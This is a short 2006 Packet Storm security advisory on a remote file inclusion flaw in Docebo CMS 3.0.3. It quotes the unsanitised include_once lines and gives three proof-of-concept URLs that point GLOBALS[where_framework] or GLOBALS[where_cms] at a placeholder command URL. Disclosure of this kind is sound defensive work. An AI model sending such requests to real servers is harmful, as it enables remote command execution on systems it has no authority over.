DoceboCMS303.txt

2006-06-12T00:00:00
ID PACKETSTORM:47246
Type packetstorm
Reporter Federico Fazzi
Modified 2006-06-12T00:00:00

Description

                                        
                                            `-----------------------------------------------------  
Advisory id: FSA:007  
  
Author: Federico Fazzi  
Date: 09/06/2006, 6:10  
Sinthesis: Docebo CMS 3.0.3, Remote command execution  
Type: high  
Product: http://www.docebolms.org/  
Patch: unavailable  
-----------------------------------------------------  
  
  
1) Description:  
  
Error occured in news_class.php,  
  
include_once($GLOBALS['where_framework']."/lib/lib.listview.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");  
  
Error occured in content_class.php,  
  
include_once($GLOBALS['where_framework']."/lib/lib.listview.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treedb.php");  
include_once($GLOBALS['where_framework']."/lib/lib.treeview.php");  
  
Error occured in util.media.php,  
  
include_once($GLOBALS["where_cms"]."/admin/modules/media/media_class.php");  
  
The users can include a remote file because  
the $GLOBALS['where_framework'], $GLOBALS['where_cms']  
isn't sanitized  
  
2) Proof of concept:  
  
http://example/doceboCms/[dc_path]admin/modules/news/news_class.php?GLOBALS[where_framework]=[cmd_url]  
http://example/doceboCms/[dc_path]admin/modules/content/content_class.php?GLOBALS[where_framework]=[cmd_url]  
http://example/doceboCms/[dc_path]admin/modules/block_media/util.media.php?GLOBALS[where_cms]=[cmd_url]  
  
3) Solution:  
  
include file where are declare $GLOBALS[*]  
`